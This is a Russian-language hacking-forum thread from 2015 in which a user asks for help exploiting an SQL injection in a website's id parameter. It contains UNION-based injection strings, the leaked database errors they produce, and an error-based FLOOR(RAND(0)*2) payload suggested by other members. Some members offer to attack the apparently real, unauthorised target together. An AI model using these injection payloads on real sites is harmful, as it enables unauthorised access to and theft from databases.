ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   Помогите раскрутить скуль (https://forum.antichat.io/showthread.php?t=432207)

user6334 29.10.2015 16:44

id = 1

На выводе пустая страница

id = 1 UNION SELECT 1

Выдает:

Код:

Ошибка базы данных.

Error Number: 1054

Unknown column 'verdict' in 'field list'

SELECT COUNT(rating) AS count FROM complex_reviews WHERE complex_id=1 UNION SELECT 1 AND verdict = 1

Filename: /modules/developers/models/reviews.php

Line Number: 242

id = 1 UNION SELECT 1--

Выдает:

Код:

Ошибка базы данных.

Error Number: 1222

The used SELECT statements have a different number of columns

SELECT `complex`.*, `developers`.`developer_title`, `developers`.`developer_id`, `developers`.`developer_city`, `developers`.`developer_logo` FROM (`complex`) JOIN `developers` ON `complex`.`developer_id` = `developers`.`developer_id` WHERE complex_id = 1 UNION SELECT 1-- ORDER BY `developers`.`developer_id` desc LIMIT 1

Filename: /modules/developers/models/model_developers.php

Line Number: 35

Помогите разобраться, хавидж раскрутил, так что мне вдвойне обидно (

ubepkr 29.10.2015 17:46

Дык Вы бы адресок дали, а то как-то не очень в теории раскручивать)) Авось, всем колхозом раздолбаем))

user6334 30.10.2015 00:56

Долбать не надо, тем более всем колхозом) Считайте, что это задача из учебника: добавляем 2 минуса и получаем совершенно другой запрос - в школе мы такого не проходили

faza02 30.10.2015 01:41

у вас два разных запроса. сначала не работает 1 из-за того, что нет колонки verdict, во второй раз ошибка в другом запросе, т. к. в первом все равно, а во втором не хватает колонок. возможно, что пройдет и union-based, но error-based должен сработать точно

user6334 30.10.2015 08:17

Цитата:

Сообщение от yarbabin

у вас два разных запроса. сначала не работает 1 из-за того, что нет колонки verdict, во второй раз ошибка в другом запросе, т. к. в первом все равно, а во втором не хватает колонок. возможно, что пройдет и union-based, но error-based должен сработать точно

А понял, значение параметра id поочередно передается в несколько запросов, так? Но как выводить поля в случае error-based?

EoGeneo 30.10.2015 08:19

ты ссылку дай да и дело с концом

faza02 30.10.2015 16:03

в случае error-based знать количество полей не нужно. подбираете вектор, затем пишете запрос

user6334 30.10.2015 16:19

Цитата:

Сообщение от yarbabin

в случае error-based знать количество полей не нужно. подбираете вектор, затем пишете запрос

это я понял, но при ошибке ведь не выводиться то, что нужно. Приведите пример запроса, пожалуйста

WallHack 30.10.2015 16:19

Цитата:

Сообщение от user6334

Помогите разобраться, хавидж раскрутил, так что мне вдвойне обидно (

Почитай

user6334 02.11.2015 14:48

Да знаю, я. Некто Квазар решил что

sELECT COUNT(*),FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.TABLES GROUP BY x

выдает ошибку, но не удосужился объяснить, почему, вот и спрашиваю

а попробуйте вместо двойки написать 1000. То же? А попробуйте теперь 46436794876


Время: 00:48